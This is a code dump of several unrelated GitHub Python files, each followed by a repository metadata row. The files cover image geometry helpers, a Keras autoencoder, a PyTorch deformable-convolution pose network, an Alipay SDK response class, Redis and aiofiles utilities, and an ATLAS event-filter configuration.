self.capture_stops.append((x,y))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--store', type=str, default='store_2', help='store name / folder')
parser.add_argument('--map', type=str, default='blender_map', help='map source / folder')
args = parser.parse_args()
args_ = vars(args)
map_details = mapDetails(args_)
map_details.run()
if __name__ == '__main__':
main()
| vrai-group/storeplanner | scripts/map_details.py | map_details.py | py | 4,227 | python | en | code | 0 | github-code | 13 |
36115388685 | import cv2
import numpy as np
def translate(img, translation, target_size=None):
'''
Translates an image by a particular amount.
translation: x, y
target_size: w, h
'''
tx, ty = translation
translation_matrix = np.float32([ [1,0,tx], [0,1,ty]])
return _warp_affine(img, translation_matrix, target_size)
def rotate(img, theta):
'''
Rotates an image from its center. Adjust the size of the output image so that rotated
image is fully contained inside it.
Steps
- Estimate the size of the bounding box for the rotated image.
- Locate the center of the target image
- Rotate the image about its center
- Move its center to the target image center
'''
h, w = img.shape[:2]
center = w//2, h//2
angle = theta
scale = 1
rotation_matrix = cv2.getRotationMatrix2D(center, angle, scale)
# get the cosine value
c = np.abs(rotation_matrix[0, 0])
# get the sine value
s = np.abs(rotation_matrix[0, 1])
# compute the size of final image
target_width = int((h * s) + (w * c))
target_height = int((h * c) + (w * s))
target_size = (target_width, target_height)
# we need to translate the image to the new center after we rotate.
target_center = target_width / 2, target_height / 2
center_translation = np.subtract(target_center, center)
tx, ty = center_translation
# incorporate this translation to the rotation matrix
rotation_matrix[0, 2] += tx
rotation_matrix[1, 2] += ty
return _warp_affine(img, rotation_matrix, target_size)
def _warp_affine(img, warp_matrix, target_size=None):
num_rows, num_cols = img.shape[:2]
if target_size:
num_cols, num_rows = target_size
warped_image = cv2.warpAffine(img, warp_matrix, (num_cols, num_rows))
return warped_image
| carnotresearch/cr-vision | src/cr/vision/geom/projective2d_actions.py | projective2d_actions.py | py | 1,825 | python | en | code | 2 | github-code | 13 |
10006307763 | #!/usr/bin/python2
'''
DAVID LETTIER
(C) 2016.
http://www.lettier.com/
Slackotron
'''
import sys
import os
import subprocess
import signal
import time
execfile(
'../bin/activate_this.py',
dict(__file__='../bin/activate_this.py')
)
ENV = os.environ.copy()
ENV['PYTHONPATH'] = ":".join(sys.path)
SLACKTRON_PROCESS = subprocess.Popen(
['python', 'src/slackotron.py'],
shell=False,
env=ENV
)
while SLACKTRON_PROCESS.poll() is None:
try:
time.sleep(1)
except KeyboardInterrupt:
SLACKTRON_PROCESS.send_signal(signal.SIGINT)
time.sleep(1)
| lettier/slackotron | run.py | run.py | py | 580 | python | en | code | 16 | github-code | 13 |
30918365173 | # https://gist.github.com/NikolayOskolkov/277d65621267658e71d06eb59b577e44#file-autoencoderciteseq-py
# Input Layer
ncol_scRNAseq = X_scRNAseq.shape[1]
input_dim_scRNAseq = Input(shape = (ncol_scRNAseq, ), name = "scRNAseq")
ncol_scProteomics = X_scProteomics.shape[1]
input_dim_scProteomics = Input(shape = (ncol_scProteomics, ), name = "scProteomics")
# Dimensions of Encoder for each OMIC
encoding_dim_scRNAseq = 50
encoding_dim_scProteomics = 10
# Encoder layer for each OMIC
encoded_scRNAseq = Dense(encoding_dim_scRNAseq, activation = 'linear',
name = "Encoder_scRNAseq")(input_dim_scRNAseq)
encoded_scProteomics = Dense(encoding_dim_scProteomics, activation = 'linear',
name = "Encoder_scProteomics")(input_dim_scProteomics)
# Merging Encoder layers from different OMICs
merge = concatenate([encoded_scRNAseq, encoded_scProteomics])
# Bottleneck compression
bottleneck = Dense(50, kernel_initializer = 'uniform', activation = 'linear',
name = "Bottleneck")(merge)
#Inverse merging
merge_inverse = Dense(encoding_dim_scRNAseq + encoding_dim_scProteomics,
activation = 'elu', name = "Concatenate_Inverse")(bottleneck)
# Decoder layer for each OMIC
decoded_scRNAseq = Dense(ncol_scRNAseq, activation = 'sigmoid',
name = "Decoder_scRNAseq")(merge_inverse)
decoded_scProteomics = Dense(ncol_scProteomics, activation = 'sigmoid',
name = "Decoder_scProteomics")(merge_inverse)
# Combining Encoder and Decoder into an Autoencoder model
autoencoder = Model(input = [input_dim_scRNAseq, input_dim_scProteomics],
output = [decoded_scRNAseq, decoded_scProteomics])
# Compile Autoencoder
autoencoder.compile(optimizer = 'adam',
loss={'Decoder_scRNAseq': 'mean_squared_error',
'Decoder_scProteomics': 'mean_squared_error'})
autoencoder.summary()
| zkxshg/Test_of_machine_learning | cite_AutoencoderCITEseq.py | cite_AutoencoderCITEseq.py | py | 2,012 | python | en | code | 0 | github-code | 13 |
19602662290 | import json
from rediscluster import RedisCluster
import redis
import os
#rc = RedisCluster(host=os.getenv('REDIS'), port=6379, decode_responses=True)
rc = redis.Redis(host=os.getenv('REDIS'), port=6379, decode_responses=True)
def initExclude():
"""Add the defualt list to redis"""
# Opening JSON file
f = open('exclude/exclude.json')
data = json.load(f)
#Set the exclude list in redis
rc.delete("sites")
rc.lpush("sites", *data['sites'])
rc.delete("maildomain")
rc.lpush("maildomain", *data['maildomain'])
rc.delete("skipEnds")
rc.lpush("skipEnds", *data['skipEnds'])
rc.delete("emails")
rc.lpush("emails", *data['emails'])
rc.delete("free")
rc.lpush("free", *data['free'])
# returns JSON object as
# a dictionary
# Closing file
f.close()
#initExclude() | mantiser-com/finder-email | exclude/initExclude.py | initExclude.py | py | 863 | python | en | code | 0 | github-code | 13 |
72678372498 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import torch
import torch.nn as nn
import numpy
# from DCNv2 import dcn_v2_conv, DCNv2, DCN
# from DCNv2 import dcn_v2_pooling, DCNv2Pooling, DCNPooling
# import layers.ConvOffset2D
BN_MOMENTUM = 0.1
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion,
momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class DeformConv2d(nn.Module):
def __init__(self, inc, outc, kernel_size=3, padding=1, stride=1, bias=None, modulation=False):
"""
Args:
modulation (bool, optional): If True, Modulated Defomable Convolution (Deformable ConvNets v2).
"""
super(DeformConv2d, self).__init__()
self.kernel_size = kernel_size
self.padding = padding
self.stride = stride
# self.zero_padding = nn.ZeroPad2d(padding)
self.conv = nn.Conv2d(inc, outc, kernel_size=kernel_size, stride=stride, bias=bias)
self.p_conv = nn.Conv2d(inc, 2*kernel_size*kernel_size, kernel_size=3, padding=1, stride=stride)
nn.init.constant_(self.p_conv.weight, 0)
self.p_conv.register_backward_hook(self._set_lr)
self.modulation = modulation
if modulation:
self.m_conv = nn.Conv2d(inc, kernel_size*kernel_size, kernel_size=3, padding=1, stride=stride)
nn.init.constant_(self.m_conv.weight, 0)
self.m_conv.register_backward_hook(self._set_lr)
@staticmethod
def _set_lr(module, grad_input, grad_output):
grad_input = (grad_input[i] * 0.1 for i in range(len(grad_input)))
grad_output = (grad_output[i] * 0.1 for i in range(len(grad_output)))
def forward(self, x):
offset = self.p_conv(x)
#(32,18,8,6)
if self.modulation:
m = torch.sigmoid(self.m_conv(x))
dtype = offset.data.type()
ks = self.kernel_size
N = offset.size(1) // 2
# if self.padding:
# x = self.zero_padding(x)
# (b, 2N, h, w)
p = self._get_p(offset, dtype)
# (b, h, w, 2N)
p = p.contiguous().permute(0, 2, 3, 1)
#(32,8,6,18)
# print(p.shape)
q_c = p.detach().floor()
q_lt = p.detach().floor()
q_rb = q_lt + 1
# print(q_lt)
q_lt = torch.cat([torch.clamp(q_lt[:, :9], 0, x.size(2)-1), torch.clamp(q_lt[:, 9:], 0, x.size(3)-1)], dim=-1).long()
q_rb = torch.cat([torch.clamp(q_rb[:, :9], 0, x.size(2)-1), torch.clamp(q_rb[:, 9:], 0, x.size(3)-1)], dim=-1).long()
q_lb = torch.cat([q_lt[:, :9], q_rb[:, 9:]], dim=-1)
q_rt = torch.cat([q_rb[:, :9], q_lt[:, 9:]], dim=-1)
# print("q_lt",q_lt.shape)
# print("q_rb",q_rb.shape)
# print("q_lb",q_lb.shape)
# print("q_rt",q_rt.shape)
# clip p
# p = torch.cat([torch.clamp(p[:, :9], 0, x.size(2)-1), torch.clamp(p[:, 9:], 0, x.size(3)-1)], dim=-1)
q_c = torch.cat([torch.clamp(q_c[:, :9], 0, x.size(2)-1), torch.clamp(q_c[:, 9:], 0, x.size(3)-1)], dim=-1)
# print(q_c.shape)
# print("1")
# bilinear kernel (b, h, w, N)
# print((1 + (q_lt[:, :9].type_as(q_c) - q_c[:, :9])).shape)
# print((1 + (q_lt[:, 9:].type_as(q_c) - q_c[:, 9:])).shape)
# print("2")
# g_lt = (1 + (q_lt[:, :9].type_as(q_c) - q_c[:, :9])) * (1 + (q_lt[:, 9:].type_as(q_c) - q_c[:, 9:]))
# g_rb = (1 - (q_rb[:, :9].type_as(q_c) - q_c[:, :9])) * (1 - (q_rb[:, 9:].type_as(q_c) - q_c[:, 9:]))
# g_lb = (1 + (q_lb[:, :9].type_as(q_c) - q_c[:, :9])) * (1 - (q_lb[:, 9:].type_as(q_c) - q_c[:, 9:]))
# g_rt = (1 - (q_rt[:, :9].type_as(q_c) - q_c[:, :9])) * (1 + (q_rt[:, 9:].type_as(q_c) - q_c[:, 9:]))
g_lt = (1 + (q_lt[:, :9].type_as(q_c) - q_c[:, :9]))
g_rb = (1 - (q_rb[:, :9].type_as(q_c) - q_c[:, :9]))
g_lb = (1 + (q_lb[:, :9].type_as(q_c) - q_c[:, :9]))
g_rt = (1 - (q_rt[:, :9].type_as(q_c) - q_c[:, :9]))
# print("g_lt",g_lt.shape)
# print("g_rb",g_rb.shape)
# print("g_lb",g_lb.shape)
# print("g_rt",g_rt.shape)
# (b, c, h, w, N)
# print(x.shape)
# print(g_lt.unsqueeze(dim=1).shape)
# p1=x
# x_q_lt = self._get_x_q(p1, q_lt, 9)
# print((g_lt.unsqueeze(dim=1) * x_q_lt).shape)
# p2=x
# x_q_rb = self._get_x_q(p2, q_rb, 9)
# p3=x
# x_q_lb = self._get_x_q(p3, q_lb, 9)
# p4=x
# x_q_rt = self._get_x_q(p4, q_rt, 9)
# print("11112222")
# (b, c, h, w, N)
# x_offset = g_lt.unsqueeze(dim=1) * x_q_lt + \
# g_rb.unsqueeze(dim=1) * x_q_rb + \
# g_lb.unsqueeze(dim=1) * x_q_lb + \
# g_rt.unsqueeze(dim=1) * x_q_rt
x_offset = g_lt.unsqueeze(dim=1) + \
g_rb.unsqueeze(dim=1) + \
g_lb.unsqueeze(dim=1) + \
g_rt.unsqueeze(dim=1)
print(x_offset.shape)
# modulation
if self.modulation:
m = m.contiguous().permute(0, 2, 3, 1)
m = m.unsqueeze(dim=1)
m = torch.cat([m for _ in range(x_offset.size(1))], dim=1)
x_offset *= m
print("111")
x_offset = self._reshape_x_offset(x_offset, ks)
print("x_offset",x_offset.type)
out = self.conv(x_offset)
return out
def _get_p_n(self, N, dtype):
p_n_x, p_n_y = torch.meshgrid(
[torch.arange(-(self.kernel_size-1)//2, (self.kernel_size-1)//2+1),
torch.arange(-(self.kernel_size-1)//2, (self.kernel_size-1)//2+1)])
# (2N, 1)
p_n = torch.cat([torch.flatten(p_n_x), torch.flatten(p_n_y)], 0)
p_n = p_n.view(1, 2*N, 1, 1).type(dtype)
#(1,18,1,1)
return p_n
def _get_p_0(self, h, w, N, dtype):
tmp1 = torch.arange(1, 17, 2)
tmp2 = torch.arange(1, 13, 2)
p_0_x, p_0_y = torch.meshgrid([tmp1,tmp2])
p_0_x = torch.flatten(p_0_x).view(1, 1, 8, 6).repeat(1, 9, 1, 1)
p_0_y = torch.flatten(p_0_y).view(1, 1, 8, 6).repeat(1, 9, 1, 1)
p_0 = torch.cat([p_0_x, p_0_y], 1).type(dtype)
#(1,18,8,6)
return p_0
def _get_p(self, offset, dtype):
#(9,8,6)
N, h, w = offset.size(1)//2, offset.size(2), offset.size(3)
# (1, 2N, 1, 1)
p_n = self._get_p_n(N, dtype)
# (1, 2N, h, w)
p_0 = self._get_p_0(h, w, N, dtype)
p = p_0 + p_n + offset
#(32,18,8,6)
return p
def _get_x_q(self, x, q, N):
b, h, w, _ = q.size()
padded_w = x.size(3)
c = x.size(1)
# (b, c, h*w)
x = x.contiguous().view(b, c, -1)
# print(x.shape)
# (b, h, w, N)
index = q[..., :N]*padded_w + q[..., N:] # offset_x*w + offset_y
# (b, c, h*w*N)
index = index.contiguous().unsqueeze(dim=1).expand(-1, c, -1, -1, -1).contiguous().view(b, c, -1)
# print(index.shape)
#(32,512,432)
x_c = x
print("333")
x_offset = torch.gather(x_c,dim=-1,index=index).contiguous().view(b, c, h, w, N)
# print(a.shape)
# x_offset = x.gather(dim=-1, index=index).contiguous().view(b, c, h, w, N)
print("x_offset",x_offset.shape)
return x_offset
@staticmethod
def _reshape_x_offset(x_offset, ks):
b, c, h, w, N = x_offset.size()
x_offset = torch.cat([x_offset[:, s:s+ks].contiguous().view(b, c, h, w*ks) for s in range(0, N, ks)], dim=-1)
print("222")
x_offset = x_offset.contiguous().view(b, c, h*ks, w*ks)
return x_offset
class Bottleneck_defo(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck_defo, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
# self.conv2 = DeformConv2d(planes, planes, kernel_size=3, stride=stride,
# padding=1, bias=False)
self.conv2 = DeformConv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion,
momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
#(32,512,16,12)
out = self.conv2(out)
print("2",out.shape)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class posemodel(nn.Module):
def __init__(self, block, layers, cfg, **kwargs):
self.inplanes = 64
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS
super(posemodel, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
block1 = Bottleneck_defo
self.layer4 = self._make_layer(block1, 512, layers[3], stride=2)
# used for deconv layers
self.deconv_layers = self._make_deconv_layer(
extra.NUM_DECONV_LAYERS,
extra.NUM_DECONV_FILTERS,
extra.NUM_DECONV_KERNELS,
)
self.final_layer = nn.Conv2d(
in_channels=extra.NUM_DECONV_FILTERS[-1],
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL,
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
for i in range(num_layers):
kernel, padding, output_padding = \
self._get_deconv_cfg(num_kernels[i], i)
planes = num_filters[i]
layers.append(
nn.ConvTranspose2d(
in_channels=self.inplanes,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias))
layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
layers.append(nn.ReLU(inplace=True))
self.inplanes = planes
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.deconv_layers(x)
x = self.final_layer(x)
return x
def init_weights(self, pretrained=''):
if os.path.isfile(pretrained):
logger.info('=> init deconv weights from normal distribution')
for name, m in self.deconv_layers.named_modules():
if isinstance(m, nn.ConvTranspose2d):
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init final conv weights from normal distribution')
for m in self.final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(pretrained))
self.load_state_dict(pretrained_state_dict, strict=False)
else:
logger.error('=> imagenet pretrained model dose not exist')
logger.error('=> please download it first')
raise ValueError('imagenet pretrained model does not exist')
resnet_spec = {18: (BasicBlock, [2, 2, 2, 2]),
34: (BasicBlock, [3, 4, 6, 3]),
50: (Bottleneck, [3, 4, 6, 3]),
101: (Bottleneck, [3, 4, 23, 3]),
152: (Bottleneck, [3, 8, 36, 3])}
def get_pose_net(cfg, is_train, **kwargs):
num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
block_class, layers = resnet_spec[num_layers]
model = posemodel(block_class, layers, cfg, **kwargs)
if is_train and cfg.MODEL.INIT_WEIGHTS:
model.init_weights(cfg.MODEL.PRETRAINED)
return model
| chenrobin/DVLPose- | lib/models/deformation.py | deformation.py | py | 17,661 | python | en | code | 0 | github-code | 13 |
17092790154 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.OperatorBaseInfo import OperatorBaseInfo
class KoubeiMerchantOperatorSearchQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiMerchantOperatorSearchQueryResponse, self).__init__()
self._operator_list = None
self._total = None
@property
def operator_list(self):
return self._operator_list
@operator_list.setter
def operator_list(self, value):
if isinstance(value, list):
self._operator_list = list()
for i in value:
if isinstance(i, OperatorBaseInfo):
self._operator_list.append(i)
else:
self._operator_list.append(OperatorBaseInfo.from_alipay_dict(i))
@property
def total(self):
return self._total
@total.setter
def total(self, value):
self._total = value
def parse_response_content(self, response_content):
response = super(KoubeiMerchantOperatorSearchQueryResponse, self).parse_response_content(response_content)
if 'operator_list' in response:
self.operator_list = response['operator_list']
if 'total' in response:
self.total = response['total']
| alipay/alipay-sdk-python-all | alipay/aop/api/response/KoubeiMerchantOperatorSearchQueryResponse.py | KoubeiMerchantOperatorSearchQueryResponse.py | py | 1,360 | python | en | code | 241 | github-code | 13 |
15939874987 | import ctypes.wintypes
from pathlib import Path
from typing import Union
import aiofiles
def align(_string, _length, _type='L') -> str:
"""
Look at https://www.jianshu.com/p/74500b7dc278
中英文混合字符串对齐函数
:param _string:[str]需要对齐的字符串
:param _length:[int]对齐长度
:param _type:[str]对齐方式('L':默认,左对齐;'R':右对齐;'C'或其他:居中对齐)
:return:[str]输出_string的对齐结果
"""
_str_len = len(_string) + sum(u'\u4e00' <= _char <= u'\u9fff' for _char in _string)
_space = _length - _str_len # 计算需要填充的空格数
if _type == 'L': # 根据对齐方式分配空格
_left = 0
_right = _space
elif _type == 'R':
_left = _space
_right = 0
else:
_left = _space // 2
_right = _space - _left
return ' ' * _left + _string + ' ' * _right
def folder_path(folder_path):
'''判定文件夹是否存在,不存在就创建
Args:
folder_path (Path): 文件夹路径
Returns:
Path: 文件夹路径
'''
if not folder_path.exists():
folder_path.mkdir()
return folder_path
def get_video_path(path_id=14):
'''获取用户视频文件夹路径
Args:
path_id (int, optional): 用户视频文件夹路径在Windows系统中的编号,不可动. Defaults to 14.
Returns:
str: 用户视频文件夹路径
'''
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(None, path_id, None, 0, buf)
return buf.value
async def write(
path: Union[str, Path],
text: str,
title: Union[str, int],
suffix: str = 'txt',
mode: str = 'w',
):
'''使用aiofiles,在文件夹下存储文件
Args:
path (Path): 文件夹路径
text (str): 文件内容
title (str): 文件标题
suffix (str, optional): 文件后缀. Defaults to 'txt'.
mode (str, optional): 写入模式,
详情请见
https://docs.python.org/zh-cn/3.10/library/functions.html#open.
Defaults to 'a'.
'''
folder = folder_path(path)
async with aiofiles.open(folder / f'{title}.{suffix}', mode) as fp:
await fp.write(text)
async def merge_ts2mp4(folder_path: Path, episodes: int = None, del_ts: bool = False):
'''将ts文件合并成mp4
Args:
folder_path (Path): 文件夹路径,里面应有ts文件
episodes (int): 动漫集数. Defaults to None.
'''
for file_path in folder_path.iterdir():
if file_path.suffix == '.ts':
async with aiofiles.open(file_path, 'rb') as f1:
async with aiofiles.open(folder_path / f"第{episodes}集.mp4", 'ab') as f2:
await f2.write(await f1.read())
if del_ts:
file_path.unlink()
| Senvlin/AnimeCrawler | AnimeCrawler/utils/file.py | file.py | py | 2,917 | python | en | code | 1 | github-code | 13 |
38006098118 |
### configure trigger filters
if len(primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames) == 0:
if rec.triggerStream() == "Egamma":
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.EgammaTriggerNames
elif rec.triggerStream() == "JetTauEtmiss":
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.JetTauEtmissTriggerNames
elif rec.triggerStream() == "Muons":
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.MuonsTriggerNames
elif rec.triggerStream() == "": # for MC the string will be empty, but we want to use all of the triggers
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.EgammaTriggerNames
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames += primRPVLLDESDM.VH_DV_triggerFilterFlags.JetTauEtmissTriggerNames
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames += primRPVLLDESDM.VH_DV_triggerFilterFlags.MuonsTriggerNames
else:
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = ["dummy"] # back-up, to prevent empty-string failure in test jobs if no triggers used
# get rid of potential doubles in the trigger lists, since attempting to add identical algs generates an ERROR
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = list(set(primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames))
triggerFilterNames=[]
from PrimaryDPDMaker.TriggerFilter import TriggerFilter
for trigName in primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames:
TriggerFilterName = "VH_DV_TriggerFilter_"+trigName
topSequence += TriggerFilter( TriggerFilterName,
trigger = trigName )
triggerFilterNames.append( TriggerFilterName )
pass
# Create a combined filter by ORing together all the trigger filters
combinedTriggerFilterName = "VH_DV_CombinedTriggerFilter"
topSequence += LogicalFilterCombiner( combinedTriggerFilterName )
triggerFilterCounter = 0
cmdstring = ""
for triggerFilterName in triggerFilterNames :
if triggerFilterCounter > 0 :
cmdstring += " or "
pass
cmdstring += triggerFilterName
triggerFilterCounter += 1
pass
topSequence.VH_DV_CombinedTriggerFilter.cmdstring = cmdstring
filtersToBookkeep+=["VH_DV_CombinedTriggerFilter"]
## a fancy jet filter
from LongLivedParticleDPDMaker.LongLivedParticleDPDMakerConf import FancyJetFilterAlg
jetFilterName = "VH_DV_JetFilter"
topSequence += FancyJetFilterAlg(jetFilterName)
topSequence.VH_DV_JetFilter.cutEtMin=primRPVLLDESDM.VH_DV_jetFilterFlags.jetPtCut
topSequence.VH_DV_JetFilter.minNumberPassed=primRPVLLDESDM.VH_DV_jetFilterFlags.nJetPassed
topSequence.VH_DV_JetFilter.cutSumPtTrkMax=primRPVLLDESDM.VH_DV_jetFilterFlags.MaxSumPtTrk
topSequence.VH_DV_JetFilter.jetCollectionName = "AntiKt4LCTopoJets"
filtersToBookkeep+=["VH_DV_JetFilter"]
## METfilter
from LongLivedParticleDPDMaker.LongLivedParticleDPDMakerConf import DVMETFilterAlg
##from PrimaryDPDMaker.MissingEtFilter import MissingEtFilter
missingetFilterName = 'VH_DV_MissingEtFilter'
topSequence += DVMETFilterAlg(missingetFilterName)
topSequence.VH_DV_MissingEtFilter.cutMetMin = primRPVLLDESDM.VH_DV_missingetFilterFlags.cutMetMin
##topSequence.VH_DV_MissingEtFilter.requireMet = True
filtersToBookkeep+=["VH_DV_MissingEtFilter"]
jetMetFilterName = "VH_DV_JetMetFilter"
topSequence += LogicalFilterCombiner( jetMetFilterName)
topSequence.VH_DV_JetMetFilter.cmdstring = "VH_DV_JetFilter and VH_DV_MissingEtFilter"
filtersToBookkeep+=["VH_DV_JetMetFilter"]
from EventUtils.EventUtilsConf import CutAlg
if rec.triggerStream() == "Muons" or rec.triggerStream() == "":
cutString="count( Muons.pt > "
cutString+=str(primRPVLLDESDM.VH_DV_muonFilterFlags.cutEtMin)
cutString+=" && abs(Muons.eta) < "
cutString+=str(primRPVLLDESDM.VH_DV_muonFilterFlags.cutEtaMax)
cutString+=" ) > 0"
muonFilterName = 'VH_DV_MuonFilter'
muonFilter = CutAlg(muonFilterName,
Cut=cutString)
topSequence+=muonFilter
combinedOfflineFilterName = "VH_DV_CombinedMuonsOfflineFilter"
topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
cmdstring = "VH_DV_MuonFilter and VH_DV_JetMetFilter"
topSequence.VH_DV_CombinedMuonsOfflineFilter.cmdstring=cmdstring
filtersToBookkeep+=["VH_DV_CombinedMuonsOfflineFilter"]
if rec.triggerStream() == "Egamma" or rec.triggerStream() == "":
electronFilterName = 'VH_DV_ElectronFilter'
cutString="count( "
cutString+= primRPVLLDESDM.VH_DV_electronFilterFlags.electronCollectionName
cutString+=".pt > "
cutString += str(primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtMin)
cutString+= " && abs("
cutString+= primRPVLLDESDM.VH_DV_electronFilterFlags.electronCollectionName
cutString+=".eta) < "
cutString+= str(primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtaMax)
cutString+=" ) > 0"
topSequence += CutAlg(electronFilterName,
Cut=cutString)
filtersToBookkeep+=["VH_DV_ElectronFilter"]
## topSequence += ElectronFilter(electronFilterName)
## topSequence.VH_DV_ElectronFilter.cutEtMin = primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtMin
## topSequence.VH_DV_ElectronFilter.cutEtaMax = primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtaMax
## topSequence.VH_DV_ElectronFilter.cutIsEM=primRPVLLDESDM.VH_DV_electronFilterFlags.cutIsEM
